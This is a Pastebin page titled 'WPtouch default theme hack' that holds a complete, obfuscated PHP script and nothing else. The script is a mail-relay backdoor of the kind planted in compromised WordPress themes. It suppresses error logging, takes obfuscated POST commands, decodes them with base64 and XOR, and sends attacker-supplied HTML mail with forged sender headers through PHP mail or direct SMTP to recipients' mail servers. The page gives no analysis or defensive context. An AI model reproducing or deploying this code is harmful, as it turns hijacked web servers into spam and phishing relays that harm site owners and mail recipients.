Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

WPtouch default theme hack

By: a guest on Jul 27th, 2013  |  syntax: PHP  |  size: 8.70 KB  |  views: 22  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
This paste has a previous version, view the difference. Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. @error_reporting(0);
  3. @ini_set('error_log', NULL);
  4. @ini_set('log_errors', 0);
  5. if (count($_POST) < 2) {
  6.     die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
  7. }
  8. $v5031e998 = false;
  9. foreach (array_keys($_POST) as $v3c6e0b8a) {
  10.     switch ($v3c6e0b8a[0]) {
  11.         case chr(108):
  12.             $vd56b6998 = $v3c6e0b8a;
  13.             break;
  14.         case chr(100):
  15.             $v8d777f38 = $v3c6e0b8a;
  16.             break;
  17.         case chr(109):
  18.             $v3d26b0b1 = $v3c6e0b8a;
  19.             break;
  20.         case chr(101);
  21.             $v5031e998 = true;
  22.             break;
  23.     }
  24. }
  25. if ($vd56b6998 === '' || $v8d777f38 === '')
  26.     die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
  27. $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
  28. $v01b6e203 = @$_POST[$vd56b6998];
  29. $v8d777f38 = @$_POST[$v8d777f38];
  30. $v3d26b0b1 = @$_POST[$v3d26b0b1];
  31. if ($v5031e998) {
  32.     $v01b6e203 = n9a2d8ce3($v01b6e203);
  33.     $v8d777f38 = n9a2d8ce3($v8d777f38);
  34.     $v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
  35. }
  36. $v01b6e203 = urldecode(stripslashes($v01b6e203));
  37. $v8d777f38 = urldecode(stripslashes($v8d777f38));
  38. $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
  39. if (strpos($v01b6e203, '#', 1) != false) {
  40.     $v16a9b63f = preg_split('/#/', $v01b6e203);
  41.     $ve2942a04 = count($v16a9b63f);
  42. } else {
  43.     $v16a9b63f[0] = $v01b6e203;
  44.     $ve2942a04    = 1;
  45. }
  46. for ($v865c0c0b = 0; $v865c0c0b < $ve2942a04; $v865c0c0b++) {
  47.     $v01b6e203 = $v16a9b63f[$v865c0c0b];
  48.     if ($v01b6e203 == '' || !strpos($v01b6e203, '@', 1))
  49.         continue;
  50.     if (strpos($v01b6e203, ';', 1) != false) {
  51.         list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
  52.         $va3da707b = ucfirst($va3da707b);
  53.         $vbfbb12dc = ucfirst($vbfbb12dc);
  54.         $v3a5939e4 = next(explode('@', $v081bde0c));
  55.         if ($vbfbb12dc == '' || $va3da707b == '') {
  56.             $vbfbb12dc = $va3da707b = '';
  57.             $v01b6e203 = $v081bde0c;
  58.         } else {
  59.             $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
  60.         }
  61.     } else {
  62.         $vbfbb12dc = $va3da707b = '';
  63.         $v081bde0c = strtolower($v01b6e203);
  64.         $v3a5939e4 = next(explode('@', $v01b6e203));
  65.     }
  66.     preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
  67.     $vee11cbb1 = $vee11cbb1[1];
  68.     preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
  69.     $vb068931c = $vb068931c[1];
  70.     preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
  71.     $vc34487c9 = $vc34487c9[1];
  72.     preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
  73.     $v6f4b5f42 = $v6f4b5f42[1];
  74.     $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
  75.     $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
  76.     $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
  77.     $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
  78.     $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
  79.     if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
  80.         $v10497e3f = false;
  81.     else
  82.         $v10497e3f = true;
  83.     $v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
  84.     if ($vb068931c != '')
  85.         $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
  86.     else
  87.         $vd98a07f8 = $v9a5cb5d8;
  88.     $vb8ddc93f = "From: $vd98a07f8\r\n";
  89.     $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
  90.     $v3c87b187 = "X-Priority: 3 (Normal)\r\n";
  91.     $v3c87b187 .= "MIME-Version: 1.0\r\n";
  92.     $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
  93.     $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
  94.     if (!in_array('mail', $v619d75f8)) {
  95.         if ($v10497e3f) {
  96.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) {
  97.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
  98.                 continue;
  99.             }
  100.         } else {
  101.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
  102.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
  103.                 continue;
  104.             }
  105.         }
  106.     }
  107.     $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
  108.     $v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
  109.     $v4340fd73 .= "To: $v01b6e203\r\n";
  110.     $v4340fd73 .= "Subject: $vc34487c9\r\n";
  111.     $v4340fd73 .= $v3c87b187;
  112.     $v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
  113.     if ($v3d26b0b1 == '')
  114.         $v3d26b0b1 = n9c812bad($v3a5939e4);
  115.     if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
  116.         echo (chr(79) . chr(75) . md5(1234567890) . "+1\n");
  117.         continue;
  118.     } else {
  119.         echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n";
  120.     }
  121. }
  122. function ne667da76($v957b527b)
  123. {
  124.     return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
  125. }
  126. function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
  127. {
  128.     $vf5a8e923 = strlen($vb45cffe0);
  129.     $vb4a88417 = '';
  130.     for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
  131.         if ($v11a95b8a >= 75) {
  132.             $v11a95b8a = $v92f21a0f;
  133.             $vb4a88417 .= $v7fa1b685;
  134.         }
  135.         $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
  136.         if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
  137.             if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
  138.                 $vb4a88417 .= chr($v4a8a08f0);
  139.                 $v11a95b8a = 0;
  140.                 continue;
  141.             }
  142.             $vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
  143.             $v11a95b8a += 3;
  144.             continue;
  145.         }
  146.         $vb4a88417 .= chr($v4a8a08f0);
  147.         $v11a95b8a++;
  148.     }
  149.     return $vb4a88417;
  150. }
  151. function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
  152. {
  153.     global $v619d75f8;
  154.     if (!in_array('fsockopen', $v619d75f8))
  155.         $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
  156.     elseif (!in_array('pfsockopen', $v619d75f8))
  157.         $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
  158.     elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
  159.         $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
  160.     else
  161.         return -1;
  162.     if (!$v66b18866) {
  163.         return 1;
  164.     } else {
  165.         $v8d777f38 = n54070395($v66b18866);
  166.         @fputs($v66b18866, "EHLO $v0897acf4\r\n");
  167.         $ve98d2f00 = n54070395($v66b18866);
  168.         if (substr($ve98d2f00, 0, 3) != 250)
  169.             return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
  170.         @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
  171.         $ve98d2f00 = n54070395($v66b18866);
  172.         if (substr($ve98d2f00, 0, 3) != 250)
  173.             return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
  174.         @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
  175.         $ve98d2f00 = n54070395($v66b18866);
  176.         if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
  177.             return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
  178.         @fputs($v66b18866, "DATA\r\n");
  179.         $ve98d2f00 = n54070395($v66b18866);
  180.         if (substr($ve98d2f00, 0, 3) != 354)
  181.             return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
  182.         @fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
  183.         $ve98d2f00 = n54070395($v66b18866);
  184.         if (substr($ve98d2f00, 0, 3) != 250)
  185.             return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
  186.         @fputs($v66b18866, "QUIT\r\n");
  187.         @fclose($v66b18866);
  188.         return 0;
  189.     }
  190. }
  191. function n54070395($v66b18866)
  192. {
  193.     $v8d777f38 = '';
  194.     while ($v341be97d = @fgets($v66b18866, 4096)) {
  195.         $v8d777f38 .= $v341be97d;
  196.         if (substr($v341be97d, 3, 1) == ' ')
  197.             break;
  198.     }
  199.     return $v8d777f38;
  200. }
  201. function n9c812bad($vad5f82e8)
  202. {
  203.     global $v619d75f8;
  204.     if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
  205.         @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
  206.         if (count($v744fa43b) === 0)
  207.             return '127.0.0.1';
  208.         $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
  209.         return $v744fa43b[$v865c0c0b[0]];
  210.     } else {
  211.         return '127.0.0.1';
  212.     }
  213. }
  214. function n9a2d8ce3($v1cb251ec)
  215. {
  216.     $v1cb251ec = base64_decode($v1cb251ec);
  217.     $vc68271a6 = '';
  218.     for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
  219.         $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
  220.     return $vc68271a6;
  221. }
  222. ?>